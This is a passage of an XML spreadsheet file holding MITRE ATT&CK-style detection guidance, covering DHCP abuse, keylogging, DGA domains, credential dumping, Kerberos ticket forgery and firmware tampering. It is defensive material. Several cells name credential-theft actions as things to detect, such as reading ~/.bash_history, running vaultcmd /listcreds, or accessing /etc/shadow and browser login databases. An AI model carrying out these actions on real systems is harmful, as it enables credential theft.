    <t>Monitor network traffic for suspicious/malicious behavior involving DHCP, such as changes in DNS and/or gateway parameters. Additionally, monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which specify that the IP allocations are low or have run out; these EIDs may indicate a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)</t>
  </si>
  <si>
    <t>File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.</t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) 
Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. </t>
  </si>
  <si>
    <t xml:space="preserve">The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. 
</t>
  </si>
  <si>
    <t>Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t>Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018)</t>
  </si>
  <si>
    <t>Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.</t>
  </si>
  <si>
    <t>Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.</t>
  </si>
  <si>
    <t>Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)</t>
  </si>
  <si>
    <t>In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.</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</si>
  <si>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standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
Monitor for DNS traffic to/from known-bad or suspicious domains.</t>
  </si>
  <si>
    <t xml:space="preserve">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standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
Monitor for web traffic to/from known-bad or suspicious domains. </t>
  </si>
  <si>
    <t>With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.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</si>
  <si>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for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Identify running processes with raw sockets. Ensure processes listed have a need for an open raw socket and are in accordance with enterprise policy.(Citation: crowdstrike bpf socket filters)</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</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</si>
  <si>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</si>
  <si>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When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.
In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers.  Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization.  Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted.  Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another.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</si>
  <si>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Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external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</si>
  <si>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Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication. For network infrastructure devices, collect AAA logging to monitor for private keys being exported.</t>
  </si>
  <si>
    <t>Monitor access to the Instance Metadata API and look for anomalous queries.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
Consider the following event IDs:(Citation: Trimarc Detecting Password Spraying)
* Domain Controllers: "Audit Logon" (Success &amp; Failure) for event ID 4625.
* Domain Controllers: "Audit Kerberos Authentication Service" (Success &amp; Failure) for event ID 4771.
* All systems: "Audit Logon" (Success &amp; Failure) for event ID 4648.</t>
  </si>
  <si>
    <t>Monitor for attempts to access SYSVOL that involve searching for XML files. 
Deploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>Monitor property changes in Group Policy: &lt;code&gt;Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\Store passwords using reversible encryption&lt;/code&gt;. By default, the property should be set to Disabled.
Monitor command-line usage for &lt;code&gt;-AllowReversiblePasswordEncryption $true&lt;/code&gt; or other actions that could be related to malicious tampering of user settings (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). Furthermore, consider monitoring and/or blocking suspicious execution of Active Directory PowerShell modules, such as &lt;code&gt;Set-ADUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountControl&lt;/code&gt;, that change account configurations. 
Monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)</t>
  </si>
  <si>
    <t>Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present)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t>
  </si>
  <si>
    <t>Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: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t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)</t>
  </si>
  <si>
    <t>While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.</t>
  </si>
  <si>
    <t>The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/\*/maps&lt;/code&gt;, where the &lt;code&gt;\*&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)
Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>Monitor process and command-line parameters of &lt;code&gt;vaultcmd.exe&lt;/code&gt; for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., &lt;code&gt;vaultcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as &lt;code&gt;CredEnumerateA&lt;/code&gt; that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, &lt;code&gt;%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\&lt;/code&gt;, for suspicious activity.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) 
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)</t>
  </si>
  <si>
    <t>Hash dumpers open the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. 
Consider monitoring file reads surrounding known password manager applications.</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.</t>
  </si>
  <si>
    <t>Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t>Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.
Event ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. Additionally, administrators should review logs for calls to the AWS Security Token Service (STS) and usage of GCP service accounts in order to identify anomalous actions.(Citation: AWS Logging IAM Calls)(Citation: GCP Monitoring Service Account Usage)</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)</t>
  </si>
  <si>
    <t>Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) disk monitoring may reveal malicious manipulations of components.(Citation: SanDisk SMART)(Citation: SmartMontools) Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
Disk check and forensic utilities may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014) Also consider comparing components, including hashes of component firmware and behavior, against known good images.</t>
  </si>
  <si>
    <t>There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. 
Run path dependent libraries can include &lt;code&gt;LC_LOAD_DYLIB&lt;/code&gt;, &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt;, and &lt;code&gt;LC_RPATH&lt;/code&gt;. Other special keywords are recognized by the macOS loader are &lt;code&gt;@rpath&lt;/code&gt;, &lt;code&gt;@loader_path&lt;/code&gt;, and &lt;code&gt;@executable_path&lt;/code&gt;.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the &lt;code&gt;otool -l&lt;/code&gt; command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)</t>
  </si>
  <si>
    <t>Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t xml:space="preserve">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Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories.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Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: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On Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) 
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.</t>
  </si>
  <si>
    <t>Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)
Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)
Utilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)
* HKLM\SOFTWARE\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
